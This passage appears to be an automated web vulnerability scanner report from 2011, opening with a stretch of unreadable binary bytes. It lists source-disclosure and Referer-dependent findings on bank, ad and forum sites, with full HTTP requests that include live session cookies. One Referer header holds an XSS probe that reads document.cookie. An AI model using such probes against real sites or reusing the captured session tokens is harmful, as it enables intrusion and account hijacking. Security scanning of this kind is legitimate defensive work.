...d,k.S.vwW/.5K..mJ..?...<..K..I..I#...:zb...Y....J.:.WM..a9........l.........vj<.z...L......5.q..uBV....4\@..~....1X...x.....1i.bQ..V}...Bt...y..    t..6...<.dALY#..C.....%bj..v..w:o.kK.X\".E....I..1.S.......{-...s_....T...4...p..t...D....<....M.8..^'.D..W..>..e<.ya.-.J.V....&{..1._.K.f'*...3.0...?.".hXt...T.0...M...[j....c.5.. ..M....+5.....Rn.I..g......$..M5?.    ...d^h.b....sA..*_......\.."i.m...ayH.U+.^^..i.%.\u...k..c.`..z,..x..].x.#>.=.Z....QL.    J...    Q...!.?y.....S..j.@,..^.I.N.`...+.....yi.._1...2..NB3_[..;..D....sD7m...k..k.!Hxd.@.4...w...t:....."[].....t.}.?xhF..hjS...!.t..D+.....@._....(...H?qF..n.{[k......... N.bP...5....9. ..F.'...y.o.....:...4......P..^...fQ.j<^..-.{.X...Lh.g.......W....tL.@C5...7...-.....!..K..l'.h..0p.6..65
y=)..)o...    B...j....s..#.D%B&......i.}(.....).2.3.'.u.F.uM{.(/.@...*........I.....BU..`.....t.v0........[.&H...G.....{[6af...<..1..8..M..`..|......a..e$`..WK.......|P?}..|>...f.!..W........Z...|.d..(.....C"tU]f..X.T\...a4..$.H...U.............!j>....M<0.X+..j....!..C.rR....p*$...bWo...B..V@0...................Ia..4.\.....T..,*.V....T-h.-s...e...8.n..Wc..X.9c......UW..}.V}.....x.A...%J..2.h....    L...y.S.j1.....E.....{VI.T..../=..S..S...G..qG
.:l...u...1...*.;....%).2./._n...R.z.c..8$N...........v.U..H.&&u<vg~..8..M.P.>......b.N..."1
...L.G.1v......0fc,Y>2^.[....PXk...1V.k....*i..$.4RF.f|$..`~R..,..LQ....8.4..g+0....w.KW......Fx=.......,..6.o..H.pe..+.
........HBs.....|PR..6...{...N".]....\2..6-'H.6..<...
.;1.....q+YQ.;....f..hM...J.X...Z...0...qC..............5.{*....t........eh.....m3>}.......X...9.J.Y.._...,y!.E..pd...Ek.R.w..&.W"..1.:.:.`.P1)V.oM.id..(B*b..    .[E.../....~.,.....    .C.k...o.&...D..DS.?.;t.u.b.vr..    2..5.)..M.04....(..<X`>.).I65{..I.jv9E..omAI+.Of+.h...S.T.U}.5.{Z.=....#.S...K........x...A..E...fE.*...:..W......Uo.m....=?.*AN.3.~.*...:O+w........~..y#..rv]6.>..1....~...".O.......@.Ie3..b...c.#.....y`...s
..H.b.....aU..T..2|...$r..F..~......R{xP.{..}/t...Oy..:41..h.|L..:...X.7.J.N...._...r.G.&.|..^$..............E.`.    .y...TK:..Z.M!..?..9.x......C...N.p.....LkD...N.Gk".._...O...X.K.W..m1L....X.....3"..RlY.$.y.&.V.`..Rf.k....h<....TQ....z...}..h.`.,........D.......o...'.2]P....h..Y+Qh...b.?......    !v.2K.:.TM..g,..d.........f...../.......?E....
.G7(\.A....]{<..tP...J..2......N R.sZ.a....O......+.Zk..m.(X,.~DO..ISE..^.....F...T..W.$...R.A~..!.....g.e|/...kP..;......J.].,..h.4......R.....T...r. %..Ar.P;.{C.N'.1.n3..&Y...k .tp\*.............%...}..C.:.%......%..$..q.....]..?).91..x.....W..pO..(.k{.....v....GU.$..$.W....=.....S.f(...z..M.Q...].$..I.m.L..u~..vF.r.T'..j&.<}d....4..h=...`..E...XQ..Q'..{.D....=.....%u..K..+..m....S........#...i..i...&...1P.9=.....=....@|.....C..Ws`..........2&j.1m..=..Ga..-N...(-......(t..n.cz.....S-....v.......P...Xc..7Z..t..A.fp...^bf#......j.uJ..R...0.[...*...nDj...
...q2    .mjs.0....<.<(p..1......9..........i..G....cU+L
o.-pn..W...eR.Q.{.....^Ihd...,...#.........,....99..I...qF.+lw.Er..$.TSg..m.K...4n...4g...,^..1 ..O.5.?....bN;......./....q.....
....j..%ic..g....C.}`..wGFKH.../....*.......VT.....;..S......"B.j.....
.............`..1!.}...M.....J
.T......J\......0F.$..Z......7.t...l.    .D...'..oL....K......u....o...t.$.r...u.39...L..J...-
R....A....................a........"(.....~4..2BUGY......G.-....A..b...~.O..`...U.. V..&.......5.^...W.....0.....y.S........p|-..    }.w...g...f+uK\S....<.....!,,8..y;.x.P...:.*...;...9..f....s..K..0.i..W.2.....24.......!.L&34.2..;*...S...r...R.t5....>Xw.~'q....]8.Q..Q......H..m.L.L.b-m..`a ..*v...+R........2X@s.....F:'a..7    ...3L.    &....s...a.N.\c7....]...n[..ba.%.E.:....^.\#.7l...JF..><.....ze....&.......D.R.%...o(R.*U.......?[^!.    .C.;.......4..h. Q..'..C.... .C..8....#..\<..........s.....].......]bw....a.S....|f+/hp..Zs.H .l.....B...g.O.U.
..(.ve.FVz>..@.j.J.L....b..bW_[.-..31K.G..9........J.    ...-...d.........CK.....)...9/#.....P.!..l..) U..?....,
...&.......Yx`...G.
.?.!.........8.;n..M.J.q=\.......s.KU...JUd...8._$.....vU.........4..... .g..B....g.*]..p.f.;..M.5..L)....@j....EY.bqr.H.u...=.....ff.s.....s...{....#....N.)    b.;...qJ9...Tk.v.t...&...L2.'v.5)5...c: ...A.c.PtD]o.<.[../....G.l.....3..........]Cr..x.m.t...g........S.p/k.....(.8....M..w.<7...z^Q:..Eh..b..N..M...@O.A...3...!..S..c9.....C..w..    B.~z).%.8/+.T.
...Tn.....k[.Z.....A!..r..7.p.....a."...|*n.......-`$K.......toZ.D.h..o.%..Q...$,#.'pTmK.........:.....T.6..kpQ..q...`b.......u'_9.4.......`.F/.,....<v.rN.@.........R...:..I..`.S."~.......`...L.A...~....._2..l.*.C.%.l^..(.....T<.?..6w...    .#GC.h.\.....p..l....bY..A.........=...R~ic%c..*K....
..k_..\......g    ......W.^..22.L.!......4W..TNAn.[hgT.0..;?.'.Z|CB./.....U)....,...-.x.."..k"L.....G.<...._.&.Q.....cWo..i=.=py..O...&...u.M0...1.pZHvr..>.$.......\....t.N.Z........%..Kl$...I.....N
I|7..|%...?.nK.hp.!.."...}.... m....8..&
(..c2.....C3..&G1..'.CY....N..k..?....+Y.."....S.|P~j....I..<h..g6|2.=....._...T+....p..^...TIF.J./...D.>3I..Y?.6....5..v...2.....`..,Me...C/...&......V..d .[HH..h2.vg:Q..F..;...W.ZVoLN*^G........r.b.!...._.a.Z.j...kE..sm    ..".0.........2.....\w.Y.,
[rr.Q.v:.1.IV.....e.....~.    .$O....9......a.2........w..4..|X.B.=.\.s.M"..........b6.D..Y.?{.(.....
..x.1...u..c.d~.Y#Ha.....w....)....3.;...s.G.hO........X9'..{B.m....Y..V..;.?.....M((Y1.MX>H...b...cr[Jos.G...........H.Z..tp./.v    ...%1yV.1.C.aN..=...]h..q.+O`c......O.C.gU..C/...P*."...)......N.I.m7..\......G..=x...8.5.....l...p5.{.@u..L....K]9...Z..+e.....fS....tY.....n*..K ..9e.>Yb./...|...V.T... .u......O.fG.9.....<..q.7j.JN>.'..b..ot..gA.9r..$"..t
..o..C.......d.Lw^......2z..CF.s....J2c.'...].y..~...2.U.._...5S.=8/2u......{A.%..{G..&..F.....X..Y...2...d..G.r$..z..~....1.R".    8;3..K3.{.......    uv...C.....[d..FS...[Mw....._...........Y?......J..w.Z...8.W0Rh.C.|......l. ..N....d...X.<,..iw}...E.............z...m....&N.*N.X.    k"K...W}I....0.ZX9o./Yd."."..[8g.;.Vp..l...._.N.2.t.pDDo...f).......m.'..:._..e ..=....,Y....En.5.@?.X.&.q.../q. TG...I.+l.~.h6...h..&.....}^;2]....x+..GT.1.5Mcs/........a....q$kK    .    -......,DK.e........[...a.v.x..U.WX..t...>..b.F\..1..O.4<M.\b...{...m.#...0..b...5.!.).g...M72.z=..4......L...]........6...";.Y'............R....H..D..H.......BaA.G.q.{..~.~....P..w...E..0....i.iha.%G..%.DE..\..&....L7...N~....|..(.Fd...+...]o.K@...Y.....d.........d...rQ........&.../.e*V.......0i.*..P45.?!Nxs&.xyKM.|w.....oqK...........Q.l...|x.U...O..d.HO.[..I.?v..L..t...C..7f.G..0.i:l...bF.zm....'.lV>.Q.}.`;.......DD.......w.GE.....>B....<_..g....-.......]+...,~.,.t..h.......m..cQ..Xa-...%..C...&.v......&..lJ................ju.*8......8.._B..."..=..fH..]xX=.&.GX.y..-..q...|...J..I.au4}..j..........a.n$e].?3.N.b.......>.&....."..A.....-.0..|.
M..+sr2.@#...{.0...k..$o{..B..2..A.|4._...a.'..9...o.5I.eF...5.E>V...y`q;.........n._+.DC.!.':...R......7..t.i.....z...te....G.E{r.Db....N.......kU..i...    l.QS-c......]....../....F..)9_.=M>UO.t7=a9..o..........x~g......"...j!.\p.i..$7}`........w.k.f....tu.i..q..
.5F....i..k~.{z..).`9.R..(........J..Y...+..@..tf.wcbR...7.j..iwX...[MsW.O..gH.....k.?..!..
l..,s.!..l%..Q...[.K....tB..L..Op_..Y.+o..D....JI.O....{....r..s.l.!    .N.....vo.S..\    ..W ..!..}..d.Wr...........=.......k\oz......%."x.......&.B...7Ls.[.......(s...H.pd.C.^.%......:GM.S'.Q7..'.....VA8....}.k6...N..D'!.....y.wk?.I.4.}Ok.A..^88..4.h..'.....T....9.6/'4.....=:X.[.G.0...~...*x....X@..p.Wx.....S-...,./...>.%...M.+*..a......r}7    S...E.D.>.....2#    t_..z.....%.w`...O.Cr2..Vk.mN.....s..4................K.c..>:;.Z.7.(......th..%(xSD..pM...O../a......C.}Y....[~...g..e.. ....../L.p.......O..AjL.....![.i......t4..........^!._:u    .3.'...`...?.!...@..M......#...>...j......dw..<}&..(...........^.E.b..x.z.4W..Z...y...4.L..... ....Y....'......f+...(q..^..*.5*.ZnR...K...%J..zM.c%'....k.=l..Q...7n.....L.+e.V..t*6J.6.x..u..bv.__.8......l.C..    .c....-../@..{(............x.!.].......
8.w...M...Y.SX..XL......J/..M..`.~M...br...O0.
....g...`?N..Z.|..u.,.. ..D..G.....{...An.P..^....#....T8.!...&.....M..].z..t.._..._....A??.."t&..gJ..j..r|{.:..;....B9...!Sal.T..A..l.E,...0.....(.w....+J.Ov]H}z..g....@...    .5.[/k.....g.$.J....af){..L..+....s*....&[=!.gV...|5....z...|..vzxQ ..9k..... Sn.`}q..x(......t..S'~.......F.C.)Mb.E.....Lw...G.....en.k...#9...%.....G...K<N~R.....DY.BZ.Frr.,AY.....zaC)!.:......=....A&.....
d...    q.p.;l.*...^B6W    .{....g....U\.L.......+.?..`(...eu&............d.mB......yO...R%
.../..u..q/{....~.:u.ipCpV....P[....    Ys..q......m^POi..Y6S..6..*..(...)../MB..3.......t.y....O..G.....G....r.`.#.......m......x..'....7?.......R..5.M....m.E.ut.XB.<_Of.o...^..."f.x.. ..............,P.....eJ_...b.e9.....n.....U2...........V.@.P..E..C..`....#j<.....a..)..f.....iG.Y....i...{.L..u..%.r..`,..WT..p.(.u.C..c....:....f.`Z.\t..
S..j.......-.F..{A...DX..7.EI........S.)....d'.\F..V.H0.@m6...45...ok.cA.}D w).....2H.4.........TB.:....%"..*u=.Py..-....Y.....>.u..s..;d..U.L....j..':T.N..&..U....A..s..Y...#^b.@...u.i...........a
..1.&.....Mv%.D`.9....5...8..(*.Z..c.r.Z.O.,.0.>....7..?..vc...^9.*..?A....BH.e....-.P..i.wS+..i6....zk....?>
s.....l-....C..r..S.......k.0M+%.)...:\.iq00.....mO@.(AiJ...5.....1#n..2S.B...p.2z.k|(..KL....Y..E.....0..qe@x.m.R........u..E5=.B...S..".*..if.......YT....|+`S..'...}l| .I.s.Ia.....|.....i"...i8.?.EM
...[SNIP]...

13.3. https://secure.opinionlab.com/pageviewer/pv_controlboard.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://secure.opinionlab.com
Path:   /pageviewer/pv_controlboard.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /pageviewer/pv_controlboard.html HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 100
Content-Type: text/html
Last-Modified: Fri, 12 Jan 2007 19:33:13 GMT
Accept-Ranges: bytes
ETag: "4d9042808036c71:206b"
Date: Wed, 02 Feb 2011 22:02:29 GMT
Connection: close

<% Response.Redirect "https://pageviewer.opinionlab.com/pv_controlboard.html?url="&Request("url") %>

13.4. https://www.ibsnetaccess.com/css/styles.css  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.ibsnetaccess.com
Path:   /css/styles.css

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /css/styles.css HTTP/1.1
Host: www.ibsnetaccess.com
Connection: keep-alive
Referer: https://www.ibsnetaccess.com/NASApp/NetAccess/LoginDisplay
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=C697A0BA2F17102F003A8D446414B7D1; TLTUID=C697A0BA2F17102F003A8D446414B7D1; JSESSIONID=0000UNiRaq4SV-vGMcUowkf6zr5:15bs25f24

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:32 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 19 Nov 2010 18:01:36 GMT
ETag: "7da003-11f9d-b285e000"
Accept-Ranges: bytes
Content-Length: 73629
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/css

/* __________________________________________________Net Access Styles___________________________________________________________*/

/*    NetAccess CSS for transparent card servicing UI
   Date last upd
...[SNIP]...
tyle: none;
}
/*august perigerine ticket-PM1021133-Start*/
div#navcontainer th,#navcontainer td {
   
   margin: 0;
   padding: 3px;
font-size: .7em;
   
}
/*august perigerine ticket-PM1021133-Start*/
<%
out.println("/*\\*//*/");
%>

div#navcontainer ul li a {
display: inline-block;
white-space: nowrap;
width: 1px;
}
<%
out.println("/**/");
%>

div#navcontainer img {
   margin-left: 11px;
   margin-bottom: -3px;
   padding:0;
}

div#navcontainer span {
   margin: 6px;
   line-height: 25px;
}


/*Created for Project More Release*/

.acctdetailmodule {
...[SNIP]...
e;
   }

div.ssContentArea ul {    
   padding:0px 0px 8px 25px;    
   margin: 0;
   }

div.ssContentArea li {    
   padding:4px 5px 0px 0px;    
   margin: 0;    
   list-style: disc;
   font-weight:bold;    
   font-size:.75em;
   }

<%
out.println("/*\\*//*/");
%>

div#navcontainer ul li a {
display: inline-block;
white-space: nowrap;
width: 1px;
}
<%
out.println("/**/");
%>

div#navcontainer img {
   margin-left: 11px;
   margin-bottom: -3px;
   padding:0;
}

div#navcontainer span {
   margin: 6px;
   line-height: 25px;
}

/*2142008*/
div.ssContentArea p.shopsafeimg {
   padding: 0 0
...[SNIP]...
<olb:styleAttribute attribute="buttonGroupBrand.border-top"/>;
}


<%-- __________________________________________________Net Access Styles___________________________________________________________--%>

div#l3wrapper {
   width: 743px;
   border: 1px solid #ccc;
   margin-top: 1px;
}

.buttonGroupBrandSmall
{
   font-size: <%=fontSize%>;
}


.groupNameContainerTextOnly {
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
   color: #333333;
   font-size: 14px;
   padding-left: 5px;
   text-align: left;
}

<%-- pingHider is to hide the ping imgage at BPC/CheckFree site--%>
.pingHider {
float:left;
margin:5px 0px 0px 0px;
padding:0px 0px 0px 0px;
}

.logalrt{
   border:1px solid #999;
   color:#333;
   width:200px;
   margin: 5px 5px 0 5px;
   padding: 10px 5p
...[SNIP]...

13.5. https://www4.usbank.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www4.usbank.com
Path:   /favicon.ico

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /favicon.ico HTTP/1.1
Host: www4.usbank.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CAMPID=""; WT_FPC=id=21c4f809eecc8bd903c1296676910391:lv=1296676910391:ss=1296676910391

Response

HTTP/1.1 404 Not Found
Content-Length: 7228
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 02 Feb 2011 22:00:56 GMT

<html>

<head>
<title>U.S. Bank Internet Banking - Page Not Found</title>
<link rel="stylesheet" href="/internetBankingStatic/css/global.css" type="text/css">

<script language="JavaScript" src=
...[SNIP]...
<img src='/internetBankingStatic/images/spacer.gif' width=10 height=0 alt="">
USB Column:<%= com.usbank.framework.common.StaticResourceFactory.getProperties().getProperty("columnName") %>
</td>
...[SNIP]...

14. Referer-dependent response  previous  next
There are 5 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.



14.1. http://ad.thehill.com/www/delivery/al.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.thehill.com
Path:   /www/delivery/al.php

Request 1

GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=0&shiftv=0&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Referer: http://thehill.com/blogs/e2-wire/677-e2-wire650aa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2295b33377e/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4

Response 1

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:32:12 GMT
Content-type: application/x-javascript
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:12 GMT; path=/
Server: lighttpd/1.4.22
Content-Length: 4457

var MAX_292f0219 = '';
MAX_292f0219 += "<"+"div id=\"MAX_292f0219\" style=\"position:absolute; width:306px; height:267px; z-index:99; left: 0px; top: 0px; visibility: hidden\">\n";
MAX_292f0219 += "<"+"table cellspacing=\"0\" cellpadding=\"0\" style=\"border-style: solid; border-width: 1px; border-color: #000000\">\n";
MAX_292f0219 += "<"+"tr>\n";
MAX_292f0219 += "<"+"td bgcolor=\"#FFFFFF\" align=\"right\" style=\"padding: 2px\"><"+"a href=\"javascript:;\" onClick=\"MAX_simplepop_292f0219(\'close\'); return false;\" style=\"color:#0000ff\"><"+"img src=\"http://ad.thehill.com/www/images/layerstyles/simple/close.gif\" width=\"7\" height=\"7\" alt=\"Close\" border=\"0\"><"+"/a><"+"/td>\n";
MAX_292f0219 += "<"+"/tr>\n";
MAX_292f0219 += "<"+"tr>\n";
MAX_292f0219 += "<"+"td bgcolor=\"#FFFFFF\" align=\"center\">\n";
MAX_292f0219 += "<"+"table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n";
MAX_292f0219 += "<"+"tr>\n";
MAX_292f0219 += "<"+"td width=\"300\" height=\"250\" align=\"center\" valign=\"middle\" style=\"padding: 2px\"><"+"a href=\'http://ad.thehill.com/www/delivery/ck.php?oaparams=2__bannerid=6337__zoneid=113__cb=e9e2c14877__maxdest=http://ui.constantcontact.com/d.jsp?m=1101665244433&p=oi\' target=\'_blank\'><"+"img src=\'http://ad.thehill.com/www/images/tipsheet.gif\' width=\'300\' height=\'250\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_6337\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad.thehill.com/www/delivery/lg.php?bannerid=6337&amp;campaignid=1930&amp;zoneid=113&amp;OACBLOCK=345600&amp;OASCCAP=1&amp;loc=http%3A%2F%2Fthehill.com%2Fblogs%2Fe2-wire%2F677-e2-wire650aa%27%253E%253Cscript%253Ealert%28document.cookie%29%253C%2Fscript%253E2295b33377e%2F137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more&amp;cb=e9e2c14877\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"/td>\n";
MAX_292f0219 += "<"+"/tr>\n";
...[SNIP]...

Request 2

GET /www/delivery/al.php?zoneid=113&cb=INSERT_RANDOM_NUMBER_HERE&layerstyle=simple&align=center&valign=middle&padding=2&closetime=8&padding=2&shifth=0&shiftv=0&closebutton=t&backcolor=FFFFFF&bordercolor=000000 HTTP/1.1
Host: ad.thehill.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4

Response 2

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Date: Thu, 03 Feb 2011 01:32:17 GMT
Content-type: application/x-javascript
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=308f74733f72a0ba99b5c2e36e2aaec4; expires=Fri, 03-Feb-2012 01:32:17 GMT; path=/
Server: lighttpd/1.4.22
Content-Length: 4198

var MAX_c981df80 = '';
MAX_c981df80 += "<"+"div id=\"MAX_c981df80\" style=\"position:absolute; width:306px; height:267px; z-index:99; left: 0px; top: 0px; visibility: hidden\">\n";
MAX_c981df80 += "<"+"table cellspacing=\"0\" cellpadding=\"0\" style=\"border-style: solid; border-width: 1px; border-color: #000000\">\n";
MAX_c981df80 += "<"+"tr>\n";
MAX_c981df80 += "<"+"td bgcolor=\"#FFFFFF\" align=\"right\" style=\"padding: 2px\"><"+"a href=\"javascript:;\" onClick=\"MAX_simplepop_c981df80(\'close\'); return false;\" style=\"color:#0000ff\"><"+"img src=\"http://ad.thehill.com/www/images/layerstyles/simple/close.gif\" width=\"7\" height=\"7\" alt=\"Close\" border=\"0\"><"+"/a><"+"/td>\n";
MAX_c981df80 += "<"+"/tr>\n";
MAX_c981df80 += "<"+"tr>\n";
MAX_c981df80 += "<"+"td bgcolor=\"#FFFFFF\" align=\"center\">\n";
MAX_c981df80 += "<"+"table border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n";
MAX_c981df80 += "<"+"tr>\n";
MAX_c981df80 += "<"+"td width=\"300\" height=\"250\" align=\"center\" valign=\"middle\" style=\"padding: 2px\"><"+"a href=\'http://ad.thehill.com/www/delivery/ck.php?oaparams=2__bannerid=6337__zoneid=113__cb=c70f5cff42__maxdest=http://ui.constantcontact.com/d.jsp?m=1101665244433&p=oi\' target=\'_blank\'><"+"img src=\'http://ad.thehill.com/www/images/tipsheet.gif\' width=\'300\' height=\'250\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_6337\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ad.thehill.com/www/delivery/lg.php?bannerid=6337&amp;campaignid=1930&amp;zoneid=113&amp;OACBLOCK=345600&amp;OASCCAP=1&amp;cb=c70f5cff42\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div><"+"/td>\n";
MAX_c981df80 += "<"+"/tr>\n";
MAX_c981df80 += "<"+"/table>\n";
MAX_c981df80 += "<"+"/td>\n";
MAX_c981df80 += "<"+"/tr>\n";
MAX_c981df80 += "<"+"/table>\n";
MAX_c981df80 += "<"+"/div>\n";
document.write(MAX_c981df80);

function MAX_findObj(n, d) {
var p,i,x; if(!d) d=document; if((p=n.
...[SNIP]...

14.2. http://community.invisionpower.com/clickheat/click.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://community.invisionpower.com
Path:   /clickheat/click.php

Request 1

GET /clickheat/click.php?s=forums&g=boardindex&x=562&y=200&w=1020&b=chrome&c=1&random=Wed%20Feb%2002%202011%2016:26:40%20GMT-0600%20(Central%20Standard%20Time) HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558; cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568

Response 1

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:25:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 568
Content-Type: text/html

<br />
<b>Warning</b>: fopen(/home/forumsi/public_html/clickheat/logs/forums,boardindex/2011-02-02.log) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in <b>/home/forumsi/public_html/clickheat/click.php</b> on line <b>92</b><br />
<br />
<b>Warning</b>: fopen(/home/forumsi/public_html/clickheat/logs/forums,boardindex/2011-02-02.log) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in <b>/home/forumsi/public_html/clickheat/click.php</b> on line <b>116</b><br />
KO, file not writable

Request 2

GET /clickheat/click.php?s=forums&g=boardindex&x=562&y=200&w=1020&b=chrome&c=1&random=Wed%20Feb%2002%202011%2016:26:40%20GMT-0600%20(Central%20Standard%20Time) HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558; cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568

Response 2

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:26:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 20
Content-Type: text/html

No domain in referer

14.3. http://community.invisionpower.com/topic/330971-ipnexus-113-released/page__pid__2073390  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://community.invisionpower.com
Path:   /topic/330971-ipnexus-113-released/page__pid__2073390

Request 1

GET /topic/330971-ipnexus-113-released/page__pid__2073390 HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
